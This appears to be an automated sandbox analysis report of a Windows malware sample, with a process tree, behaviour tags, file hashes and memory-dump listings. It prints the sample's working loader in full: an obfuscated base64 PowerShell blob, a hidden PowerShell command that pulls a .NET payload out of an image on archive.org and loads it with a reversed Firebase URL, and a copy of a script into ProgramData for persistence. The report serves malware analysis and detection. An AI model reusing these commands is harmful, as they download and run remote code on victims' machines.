´G8䷡ ㌝ ₋ ⊩ ´bg䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQBi䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´eQBd䷡ ㌝ ₋ ⊩ ´Do䷡ ㌝ ₋ ⊩ ´OgBM䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YQBk䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´Bj䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´bQBt䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bgBk䷡ ㌝ ₋ ⊩ ´EI䷡ ㌝ ₋ ⊩ ´eQB0䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cw䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´Ds䷡ ㌝ ₋ ⊩ ´J䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´QQBz䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQBt䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´RwBl䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´V䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bu䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´aQBi䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´SQBP䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´S䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´Ow䷡ ㌝ ₋ ⊩ ´k䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´bwBk䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´PQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´Ec䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´E0䷡ ㌝ ₋ ⊩ ´ZQB0䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´bwBk䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´JwBW䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´SQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Ck䷡ ㌝ ₋ ⊩ ´LgBJ䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´dgBv䷡ ㌝ ₋ ⊩ ´Gs䷡ ㌝ ₋ ⊩ ´ZQ䷡ ㌝ ₋ ⊩ ´o䷡ ㌝ ₋ ⊩ ´CQ䷡ ㌝ ₋ ⊩ ´bgB1䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´s䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´WwBv䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´agBl䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bb䷡ ㌝ ₋ ⊩ ´F0䷡ ㌝ ₋ ⊩ ´XQ䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cg䷡ ㌝ ₋ ⊩ ´JwBj䷡ ㌝ ₋ ⊩ ´GM䷡ ㌝ ₋ ⊩ ´O䷡ ㌝ ₋ ⊩ ´Bi䷡ ㌝ ₋ ⊩ ´DU䷡ ㌝ ₋ ⊩ ´OQBl䷡ ㌝ ₋ ⊩ ´DM䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´1䷡ ㌝ ₋ ⊩ ´DY䷡ ㌝ ₋ ⊩ ´Zg䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Nw䷡ ㌝ ₋ ⊩ ´2䷡ ㌝ ₋ ⊩ ´Dg䷡ ㌝ ₋ ⊩ ´LQBm䷡ ㌝ ₋ ⊩ ´GI䷡ ㌝ ₋ ⊩ ´Yg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´C0䷡ ㌝ ₋ ⊩ ´OQBl䷡ ㌝ ₋ ⊩ ´Dc䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´t䷡ ㌝ ₋ ⊩ ´GQ䷡ ㌝ ₋ ⊩ ´O䷡ ㌝ ₋ ⊩ ´Bl䷡ ㌝ ₋ ⊩ ´Dk䷡ ㌝ ₋ ⊩ ´MwBi䷡ ㌝ ₋ ⊩ ´GY䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´G4䷡ ㌝ ₋ ⊩ ´ZQBr䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´m䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´aQBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´bQ䷡ ㌝ ₋ ⊩ ´9䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´b䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´D8䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´B4䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´Lg䷡ ㌝ ₋ ⊩ ´x䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´N䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´4䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´NQ䷡ ㌝ ₋ ⊩ ´w䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´cgBv䷡ ㌝ ₋ ⊩ ´Hc䷡ ㌝ ₋ ⊩ ´e䷡ ㌝ ₋ ⊩ ´B5䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´YgBp䷡ ㌝ ₋ ⊩ ´Gg䷡ ㌝ ₋ ⊩ ´Yw䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´LwBt䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Yw䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´bwBw䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Lg䷡ ㌝ ₋ ⊩ ´0䷡ ㌝ ₋ ⊩ ´DI䷡ ㌝ ₋ ⊩ ´M䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´y䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bw䷡ ㌝ ₋ ⊩ ´Hk䷡ ㌝ ₋ ⊩ ´cgBj䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Yg䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´D䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´dg䷡ ㌝ ₋ ⊩ ´v䷡ ㌝ ₋ ⊩ ´G0䷡ ㌝ ₋ ⊩ ´bwBj䷡ ㌝ ₋ ⊩ ´C4䷡ ㌝ ₋ ⊩ ´cwBp䷡ ㌝ ₋ ⊩ ´H䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´YQBl䷡ ㌝ ₋ ⊩ ´Gw䷡ ㌝ ₋ ⊩ ´ZwBv䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´Zw䷡ ㌝ ₋ ⊩ ´u䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´ZwBh䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwB0䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´ZQBz䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´YgBl䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´aQBm䷡ ㌝ ₋ ⊩ ´C8䷡ ㌝ ₋ ⊩ ´Lw䷡ ㌝ ₋ ⊩ ´6䷡ ㌝ ₋ ⊩ ´HM䷡ ㌝ ₋ ⊩ ´c䷡ ㌝ ₋ ⊩ ´B0䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´a䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´MQ䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´C䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´Qw䷡ ㌝ ₋ ⊩ ´6䷡ ㌝ ₋ ⊩ ´Fw䷡ ㌝ ₋ ⊩ ´U䷡ ㌝ ₋ ⊩ ´By䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´ZwBy䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´bQBE䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´d䷡ ㌝ ₋ ⊩ ´Bh䷡ ㌝ ₋ ⊩ ´Fw䷡ ㌝ ₋ ⊩ ´Jw䷡ ㌝ ₋ ⊩ ´g䷡ ㌝ ₋ ⊩ ´Cw䷡ ㌝ ₋ ⊩ ´I䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Gk䷡ ㌝ ₋ ⊩ ´bgBj䷡ ㌝ ₋ ⊩ ´HU䷡ ㌝ ₋ ⊩ ´cgBp䷡ ㌝ ₋ ⊩ ´G8䷡ ㌝ ₋ ⊩ ´cwBv䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´L䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´EE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bk䷡ ㌝ ₋ ⊩ ´Ek䷡ ㌝ ₋ ⊩ ´bgBQ䷡ ㌝ ₋ ⊩ ´HI䷡ ㌝ ₋ ⊩ ´bwBj䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cwBz䷡ ㌝ ₋ ⊩ ´DM䷡ ㌝ ₋ ⊩ ´Mg䷡ ㌝ ₋ ⊩ ´n䷡ ㌝ ₋ ⊩ ´Cw䷡ ㌝ ₋ ⊩ ´JwBk䷡ ㌝ ₋ ⊩ ´GU䷡ ㌝ ₋ ⊩ ´cwBh䷡ ㌝ ₋ ⊩ ´HQ䷡ ㌝ ₋ ⊩ ´aQB2䷡ ㌝ ₋ ⊩ ´GE䷡ ㌝ ₋ ⊩ ´Z䷡ ㌝ ₋ ⊩ ´Bv䷡ ㌝ ₋ ⊩ ´Cc䷡ ㌝ ₋ ⊩ ´KQ䷡ ㌝ ₋ ⊩ ´p䷡ ㌝ ₋ ⊩ ´䷡ ㌝ ₋ ⊩ ´==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('䷡ ㌝ ₋ ⊩ ´','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('cc8b59e3256f-a768-fbb4-9e70-d8e93bf2=nekot&aidem=tla?txt.1042028050mrowxyobihc/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'incurioso','AddInProcess32','desativado'))"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\incurioso.js"
          4⤵
            PID:4572
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3780
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4228,i,16315016104747277319,5510969007830467313,262144 --variations-seed-version --mojo-platform-channel-handle=4508 /prefetch:8
      1⤵
        PID:1556

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        64B

        MD5

        5caad758326454b5788ec35315c4c304

        SHA1

        3aef8dba8042662a7fcf97e51047dc636b4d4724

        SHA256

        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

        SHA512

        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wogir5wf.deg.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • memory/1144-24-0x00000217CECC0000-0x00000217CEDE2000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/1440-22-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1440-32-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1440-23-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1440-12-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1440-0-0x00007FF947323000-0x00007FF947325000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1440-11-0x00007FF947320000-0x00007FF947DE1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1440-1-0x0000021B799A0000-0x0000021B799C2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3780-34-0x0000000005F40000-0x00000000064E4000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3780-33-0x00000000055A0000-0x000000000563C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/3780-26-0x0000000000400000-0x0000000000410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3780-35-0x00000000064F0000-0x0000000006582000-memory.dmp

        Filesize

        584KB

        Download

      • memory/3780-36-0x0000000005F30000-0x0000000005F3A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3780-37-0x0000000006750000-0x00000000067B6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/3780-38-0x00000000071E0000-0x00000000072FE000-memory.dmp

        Filesize

        1.1MB

        Download

      • memory/3780-39-0x0000000007320000-0x0000000007674000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/3780-40-0x0000000007810000-0x000000000785C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/3780-76-0x0000000007920000-0x0000000007942000-memory.dmp

        Filesize

        136KB

        Download